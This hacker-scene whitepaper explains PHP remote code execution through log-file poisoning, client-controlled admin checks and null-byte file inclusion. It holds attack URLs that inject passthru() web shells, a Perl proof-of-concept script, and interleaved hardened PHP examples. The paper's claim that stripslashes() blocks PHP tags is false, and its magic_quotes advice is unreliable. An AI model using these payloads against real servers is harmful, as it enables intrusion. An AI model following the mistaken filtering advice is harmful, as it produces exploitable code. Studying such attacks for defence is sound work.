
Whitepaper entitled PHP Endangers – Remote Code Execution.

/*
Php Endangers - Remote Code Execution
Arham Muhammad
rko.thelegendkiller@gmail.com

*/

============================
An Article By Arham Muhammad
Hacking-Truths.Net
============================

x41 - Intro
x42 - Basics Of Remote Code Execution And How It Develops
x43 - Exactly How An Attacker Gets Advantage Over This Vulnerability And Misuses It!
x44 - Prevention And Filtration
x45 - Conclusion

========================================================
x41 - Intro
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++

The B@sIc::
InTr0:

Remote Code Execution is yet another common vulnerability
existing in a wide range of web apps in the current era. It allows a remote
attacker to execute arbitrary code on the system
with administrator privileges without the attention of
the owner of the targeted site. It's not just a hole to avoid, but an
extremely risky vulnerability, which can expose your site to different attacks,
malicious deletion of data, even worse, defacing!

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++

x42 - Basics Of Remote Code Execution And How It Develops
============================================================

Basic Remote Code Executions:

Now I will highlight some basic remote code executions
that get planted in code and still exist in this era of web app development.

We will now examine a comment form that takes comments from a user ("submit.php") and posts them to "comments.php".

We are analyzing submit.php with a simple POST method that submits the gathered user input and forwards the request to
comments.php.

/*

submit.php::

<form method="POST" action="comments.php">
<textarea rows="10" name="comments" cols="60"></textarea>
<p><input type="submit" value="Post" name="sub"></p>
</form>

==========================================================

comments.php::

<?php

$comments = $_POST['comments'];
$log = fopen('comments.php','a');
fwrite($log,'<br />'.'<br />'.'<center>'.'Comments::'.'<br />'.$comments); // raw user input appended to a .php file
fclose($log);

?>

*/

Now by just looking at it, we can very easily prove it insane! How?? Well, as we can see there is a form that submits
whatever comments the user entered to comments.php, malicious ones included, and comments.php writes the comments exactly as the user typed them
without any sanitizing. This means that an attacker here gets full advantage to exploit the vulnerable comment
submission form by executing some malicious request, which could be just to gather server details, like using phpinfo(),
which is an exceptional case for attackers these days, or, even more pathetic, could be getting a shell on a vulnerable server.

We will take another example using a GET request to display an error message and log the IP with the specific message.
(it's a common vulnerability planted by the coder while developing a website for an organization, etc).

/*

info.php::

<?php
$msg = $_GET['msg'];
$ip = getenv('REMOTE_ADDR');
$error = fopen('errorlog.php','a');
fwrite($error,'<br />'.$msg.'<br />'.$ip.'<br />');
fclose($error);
?>

*/

This piece is not only affected by and vulnerable to remote code execution but also to several other attacks including
XSS, JavaScript injection, VBScript injection, etc.

This will also allow a remote attacker to poison the log file and inject malicious code into the logs.
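The same two scripts (comments.php and info.php) rewritten from the defender's side, as an added example that is not part of this paper: the log is written to a plain-text file outside the web root instead of a .php file, so a stored "<?php ... ?>" is never executed or included, and anything shown back in the browser is HTML-encoded first, which also closes the XSS and script-injection issues mentioned above. The log directory, the `LOG_DIR` constant and the helper names `encodeForHtml` and `appendLogRecord` are my assumptions, not names from the paper.

```php
<?php
// Added example (not the paper's code): comments.php / info.php rewritten so
// that user input can never become executable code.
//
// Two changes matter:
//   1. The log is a plain-text file outside the web root, not a .php file, so
//      even an unfiltered "<?php ... ?>" is just bytes that are never executed.
//   2. Anything rendered back into a page is HTML-encoded first.

// Assumed location; adjust to your deployment. Must not be served by the web server.
const LOG_DIR = __DIR__ . '/../logs';

if (!is_dir(LOG_DIR)) {
    mkdir(LOG_DIR, 0700, true);
}

// Encode a value so it is inert when echoed into HTML.
function encodeForHtml(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

// Append one record to a non-executable .log file. Newlines inside the value
// are escaped so a request cannot forge extra log lines.
function appendLogRecord(string $logName, string $ip, string $message): bool
{
    $safeMessage = str_replace(["\r", "\n"], ['\\r', '\\n'], $message);
    $line = sprintf("%s\t%s\t%s\n", date('c'), $ip, $safeMessage);
    // LOCK_EX avoids interleaved writes; FILE_APPEND keeps earlier records.
    return file_put_contents(LOG_DIR . '/' . $logName . '.log', $line, FILE_APPEND | LOCK_EX) !== false;
}

// Hardened counterpart of comments.php
if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['comments'])) {
    $comment = (string) $_POST['comments'];
    if (strlen($comment) > 4000) {          // bound the size of what is stored
        http_response_code(413);
        exit;
    }
    appendLogRecord('comments', $_SERVER['REMOTE_ADDR'] ?? '-', $comment);
    // On display the value is encoded, so "<?php phpinfo(); ?>" is shown, not run.
    echo '<p>Comments::</p><pre>' . encodeForHtml($comment) . '</pre>';
}

// Hardened counterpart of info.php
if (isset($_GET['msg'])) {
    $msg = (string) $_GET['msg'];
    appendLogRecord('errors', $_SERVER['REMOTE_ADDR'] ?? '-', $msg);
    echo '<p>' . encodeForHtml($msg) . '</p>';
}
```

The point of the `.log` extension and the out-of-webroot directory is that the file is never a candidate for execution or inclusion, whatever it contains; the encoding on output is a separate control for the browser side, and neither replaces the other.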
============================================================================================================

Now I will highlight another type of remote code execution, which can also be defined as poisoning the cookies ;)

/*
<?php
require("config.php");
if(!isset($_COOKIE['admin']))
{
header("Location:admin.php?user=admin");
}
?>
*/

Now we see the code is really pissed! In simple terms, it's trying to say that if the cookies of the system match "admin"
then it verifies the user as the administrator. This is totally bad!

We will look at another example like this which uses a GET request to verify a user's status::

/*
$admin = $_GET['admin'];
if(!isset($admin == 1)){
$queryxyz = "SELECT * from user where username='$admin'";
header("Location:admin/admin.php");
}
*/

It can be more complicated than that; most probably sessions would be used to verify the admin if the
variable "admin" matched "1". However, this is just an SQL query used to select administrator as the user when
admin = 1 ;) The query is possibly giving another vulnerability :P Yeah, right, "SQL INJection!";
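A session-based replacement for the cookie and GET checks above, added here as an example and not taken from the paper: the admin flag is decided by the server from a password check and stored only in the server-side session, so nothing the browser sends (an `admin` cookie, `admin=1` in the query string) is trusted, and the username reaches the database as a bound parameter instead of being pasted into the SQL text, which closes the injection pointed out above. The SQLite DSN, the `user` table layout (username, password_hash, is_admin) and the helper names `loginUser` and `requireAdmin` are assumptions for the example.

```php
<?php
// Added example (not the paper's code): admin access decided by the server,
// never by a client-controlled cookie or GET parameter.

// Assumed: PHP 7.3+ for the array form of session_set_cookie_params().
session_set_cookie_params([
    'httponly' => true,   // script cannot read the session cookie
    'secure'   => true,   // only sent over HTTPS
    'samesite' => 'Lax',
]);
session_start();

// Assumed DSN; a SQLite file is used so the example runs without a server.
$db = new PDO('sqlite:' . __DIR__ . '/example.sqlite');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);

// Called once from the login form. Returns true only after a password check;
// the is_admin flag comes from the database row, not from the request.
function loginUser(PDO $db, string $username, string $password): bool
{
    // Bound parameter: the username is data, never part of the SQL text.
    $stmt = $db->prepare('SELECT password_hash, is_admin FROM user WHERE username = :u');
    $stmt->execute([':u' => $username]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    if ($row === false || !password_verify($password, $row['password_hash'])) {
        return false;
    }
    session_regenerate_id(true);              // new id on privilege change (session fixation)
    $_SESSION['username'] = $username;
    $_SESSION['is_admin'] = (bool) $row['is_admin'];
    return true;
}

// Guard to call at the top of admin/admin.php: the flag lives only in the
// server-side session, so editing cookies or the query string cannot set it.
function requireAdmin(): void
{
    if (empty($_SESSION['is_admin'])) {
        http_response_code(403);
        exit('Forbidden');
    }
}

if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['username'], $_POST['password'])) {
    if (loginUser($db, (string) $_POST['username'], (string) $_POST['password'])) {
        header('Location: admin/admin.php');
        exit;
    }
    http_response_code(401);
    echo 'Login failed';
}
```

The session cookie that results is still a bearer token, which is why it is flagged HttpOnly and Secure and the id is regenerated at login; the difference from the paper's pattern is that its value is an opaque identifier the server maps to state, not a flag the client can set to "admin".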
=================================================================================================================

Remote Code Execution is also possible through header injection or an arbitrary file upload if there's a file processing
system and it is not sanitized.

=================================================================================================================

=========================================================================================================
x43 - Exactly How An Attacker Gets Advantage Over This Vulnerability And Misuses It!
=========================================================================================================

I will highlight exactly how an attacker manages to do this.

Suppose an attacker finds a vulnerable target and gets hold of the news that a GET variable has been
implemented there in order to log particular data to some specific file, let's say 'x'. The attacker will struggle their
best to get hold of the file where the data is being written; path arrays are used by the attacker for successful exploitation,
and then of course the attacker will likely inject some malicious
string in order to check if it's filtering the output. In this case, no, it's not doing any checkup or using the htmlentities() or
htmlspecialchars() funcs. So the attacker will likely get a hell of a lot of benefit from this. Most probably he will try to spawn
a shell on the targeted server to gain full advantage for his or her blackhat stuff ;)
Supposing an attack on the victim host:

http://victim.xxx/info.php?msg=<? passthru($_GET['attacker']); ?>

This will poison the log file and inject a vulnerable piece of code which can later be exploited and
treated as a Remote File Inclusion (RFI) vulnerability
to get a shell on the victim server and show his/her dirty work..

Probably, ||http://victim.xxx/errorlog.php?attacker=Sh3ll?||

This will do the work! ;)

In some other cases, like the "if(!isset($admin == 1)" one, it could also be exploited with great ease; the attacker just
has to spoof the variable in the request to the server, and that's not at all difficult, it being a GET variable :p

http://victim.xxx/file.php?admin=1

This will do it ;)

And for the cookies thingy it's the same... just edit the cookies and you are the master!

Supposing the pattern below::

if(!isset($_COOKIE['administrator'])){
//Some Authentication Headers Below
...
}

In this type of pattern, you just change the cookie to administrator and tada, you are in as admin!

It's better to handle the case with care. I will now write a little POC (Proof-Of-Concept) in order to explain
and exploit the target remotely and quite easily! It's not good, but important, to use such a script
to exploit the issue and execute the command successfully, since the browser will surely encode your tags, making
the request not at all efficient or successful!

The script below would bypass this, and fulfill its purpose at all cost :)

=================================================================================================

POC::
/*
#!/usr/bin/perl
#Php Endangers - Remote Code Execution
#POC To inject and execute a malicious request, probably spawning and executing a shell command

use LWP::Simple;
use LWP::UserAgent;

sub header()
{

print q{
-----------------------------------------------------------------------------------------
Usage <target> <vulnerable file> <variable> <log file> <shell> <command>
Example roc.pl http://127.0.0.1 info.php msg errorlog.php http://127.0.0.1/r57.txt ls -la
------------------------------------------------------------------------------------------
}
}

$inject = "<?php if(get_magic_quotes_gpc()){ /$_GET[cmd]=stripslashes(/$_GET[cmd])/;} passthru(/$_GET[cmd])/; ?>";

#You may notice some additional funcs used to inject, these are to execute and produce 99% successful result
#it would help and bypass magic_quotes func and stripslashes too, that would possibly of lot good to the attacker!

if(@ARGV !=5){
header();
}

$target = @ARGV[0];
$file = @ARGV[1];
$var = @ARGV[2];
$log = @ARGV[3];
$shell = @ARGV[4];
$command = @ARGV[5];

$agent = LWP::UserAgent->new();
$exec = "http://$target/$file?$var=$inject";
$agent->get("$exec");
$exec2 = "http://$target/$log?attacker=$shell&$cmd=$command?";
$agent->get("$exec2")
or die"Host Seems Down";
print "Injected Successfully!!";

print "Check The Shell Manually At"." "."http://$target/$log?attacker=$shell&$cmd=$command?";

#REMOTE CODE EXECUTION
#An explanation POC for exploiting the roc(Remote CODE Execution) Vulnerability.
*/

===============================================================================================================
Null Bytes Injection::

In a piece of code like the one mentioned below, it would be a wonder to an attacker how to eliminate the compulsory
file extension and exploit the vulnerability or use the inclusion to execute a shell upon the targeted server.

<?php
$file = $_GET['file'];
// user-supplied value with '.php' appended (double quotes so $file is interpolated)
include("$file.php");
?>

Now we can clearly declare the above code a critical vulnerability, helping an attacker do an LFI or RFI depending
on the attacker's strategy. But it's clear that the inclusion would fail because of the appended extension.

Now the attacker would surely not like this at all, and will try to eliminate the extension by using NULL BYTES, or poisoning
the request with null bytes.

Below is an example of what exactly happens when an inclusion is performed in such a case::

http://victim.xxx/include.php?file=http://127.0.0.1/sh3ll.txt?

Since the code is adding the extension after the $file variable, it would be adding .php after .txt, thus making
the exploitation dumb; in simple terms it would make the request look like::

http://victim.xxx/include.php?file=http://127.0.0.1/sh3ll.txt.php?

where no such file exists!

Now the attacker will eliminate the extension to successfully exploit the issue by poisoning the request
with null bytes; below is how the attacker would manage to do so::

http://victim.xxx/include.php?file=http://127.0.0.1/sh3ll.txt%00

This would make the request drop the additional extension, and would successfully exploit the issue!
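The include.php pattern rebuilt so that the `file` parameter can only select pages the developer listed, added here as an example and not taken from the paper. One caveat a practitioner should know: PHP 5.3.4 and later reject a path containing a NUL byte in include(), so the %00 trick by itself fails on any supported PHP version; what the allowlist and the realpath() check below add is protection against the remaining `../` and remote-URL variants, which do not depend on null bytes at all. The `PAGES_DIR` location, the `PAGES` map and the helper name `resolvePage` are assumptions for the example.

```php
<?php
// Added example (not the paper's code): include.php with the request value
// used as a key into an allowlist instead of as a path. This removes LFI,
// RFI and the null-byte extension trick in one step.

// Assumed directory of includable page fragments.
const PAGES_DIR = __DIR__ . '/pages';

// Explicit allowlist: request value => file on disk. Anything else is rejected,
// so "../../etc/passwd" or "http://127.0.0.1/sh3ll.txt" never reach include().
const PAGES = [
    'home'    => 'home.php',
    'about'   => 'about.php',
    'contact' => 'contact.php',
];

// Returns the absolute path to include, or null if the request is not allowed.
function resolvePage(?string $requested): ?string
{
    if ($requested === null || !array_key_exists($requested, PAGES)) {
        return null;
    }
    $path = realpath(PAGES_DIR . '/' . PAGES[$requested]);
    $base = realpath(PAGES_DIR);
    // realpath() resolves symlinks and "..": confirm the result stayed inside PAGES_DIR
    // (defence in depth in case the allowlist is ever edited to contain a bad entry).
    if ($path === false || $base === false || strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $path;
}

$page = resolvePage(isset($_GET['file']) ? (string) $_GET['file'] : null);
if ($page === null) {
    http_response_code(404);
    exit('No such page');
}
include $page;
```

Independently of the code, keeping `allow_url_include=Off` in php.ini (the default) means include() will refuse http:// and ftp:// paths even in code that still builds the path from user input.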

=====================================================================================================
x44 - Prevention And Filtration

=====================================================================================================
Prevention::

It's better to design whatever form in such a way that it sanitizes and filters the user input before
writing or actually executing the request on the server. This can be done easily with PHP's
built-in htmlentities(), htmlspecialchars() and, most importantly, strip_tags() and stripslashes() functions.
This will abort a malicious request and execute the request after the malicious tags have been removed.
For instance, an attacker trying to inject a piece of code 'y' into a GET variable....

http://victim.xxx/file.php?var=<? phpinfo(); ?>

Now if the file is under htmlentities, htmlspecialchars, strip_tags or stripslashes() protection, then this will make the
attacker's request totally dumb and of course of no use!

Supposing a simple filtration pattern:

/*
<?php
$data = stripslashes($_GET['data']);
$fh = fopen('file.php','a');
fwrite($fh,$data);
fclose($fh);
?>
*/

This will abort the tags "<?", "?>", "()" and of course will make the rest of the piece of code of no use; since
"phpinfo" is not insane or malicious looking, the server will only write that in exact ASCII form to the file.

There are even better cures by turning magic_quotes on; however, it can cause some other complicated problems if not used properly,
so it's not recommended to beginners until they know what they are doing.
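An added check, not from the paper, that runs each of the four functions named above over the paper's sample value and two similar constructed strings, and reports for each output whether it can still open a PHP tag if written into a .php file. The helper names `applyFilters` and `cannotOpenPhpTag` and the sample strings are my own.

```php
<?php
// Added check (not part of the paper): what each filter function actually
// changes, so the right one is chosen for the right output context.

// Apply every function the paper recommends to one input.
function applyFilters(string $input): array
{
    return [
        'stripslashes'     => stripslashes($input),
        'strip_tags'       => strip_tags($input),
        'htmlspecialchars' => htmlspecialchars($input, ENT_QUOTES, 'UTF-8'),
        'htmlentities'     => htmlentities($input, ENT_QUOTES, 'UTF-8'),
    ];
}

// True if the value can no longer open a PHP tag when appended to a .php file.
// This is the property that matters for the file-writing pattern above.
function cannotOpenPhpTag(string $value): bool
{
    return strpos($value, '<?') === false;
}

// Constructed samples: the value from the paper's example request, a full
// "<?php" form, and a string carrying the backslashes that magic_quotes adds.
$samples = [
    '<? phpinfo(); ?>',
    '<?php passthru(\'id\'); ?>',
    '<?php echo \\\'hi\\\'; ?>',
];

foreach ($samples as $s) {
    echo "input: $s\n";
    foreach (applyFilters($s) as $name => $out) {
        printf("  %-16s -> %-40s tag opener removed: %s\n",
            $name, var_export($out, true), cannotOpenPhpTag($out) ? 'yes' : 'no');
    }
}
```

Running it shows that the four functions are not interchangeable: stripslashes() only removes backslashes and leaves `<?` in place, htmlspecialchars() and htmlentities() turn `<` and `>` into entities (the right choice when the value is echoed into HTML), and strip_tags() removes the whole `<? ... ?>` block. Which one is appropriate depends on where the value is going, and for a value written into a file the safest choice is still a file that PHP will never execute.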

===========================================================================================================================
x45 - Conclusion
===========================================================================================================================

Conclusion::

I have used several examples to explain the basics of remote code execution and exactly how it's planted in web apps.
I have tried my level best to explain the terms and consequences in simple and easy words, including all the pieces of code
mentioned here. However, I don't hold any responsibility for any misuse or dirty work performed by gaining the knowledge
within the paper. Besides this, I strongly recommend all to go through it; it's simple and easy and will awaken you to the dangers
that can be encountered through little careless mistakes!

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

PhP EnDang3rs - R3m0t3 c0d3 3x3cu-|!on

===============================================================================================================================================================
Greets:: str0ke(soo supportive nd the best!),HackMan(simply gr8),tushy,(owe you a lot!) Abdullah,Saad,Faisal,
Maaz,Talha And Ofcourse my sweet sweet AmBi(My love!!) ;)

Wishes also goes to all my friends at milw0rm forum(the place i loved and every body does) and to the whole of
Pakistan!!

Of course Hacking-Truths.Net - A Great Place To Get Hold With Latest Stuff!

And Evergreen milw0rm.com

================================================================================
